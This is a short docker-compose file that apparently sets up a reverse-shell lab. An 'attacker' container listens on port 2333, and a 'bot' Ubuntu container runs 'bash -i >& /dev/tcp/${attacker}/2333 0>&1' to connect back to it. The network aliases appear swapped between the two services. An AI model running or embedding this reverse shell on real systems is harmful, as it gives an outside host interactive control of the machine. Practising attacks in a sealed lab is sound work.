version: "3.7"
services:
  attacker:
    build: ./attacker
    ports:
      - "2333:2333"
    networks:
      mynet:
        aliases:
          - bot
  bot:
    image: ubuntu:18.04
    command: bash -c "bash -i >& /dev/tcp/${attacker}/2333 0>&1"
    networks:
      mynet:
        aliases:
          - attacker

networks:
  mynet:
    driver: bridge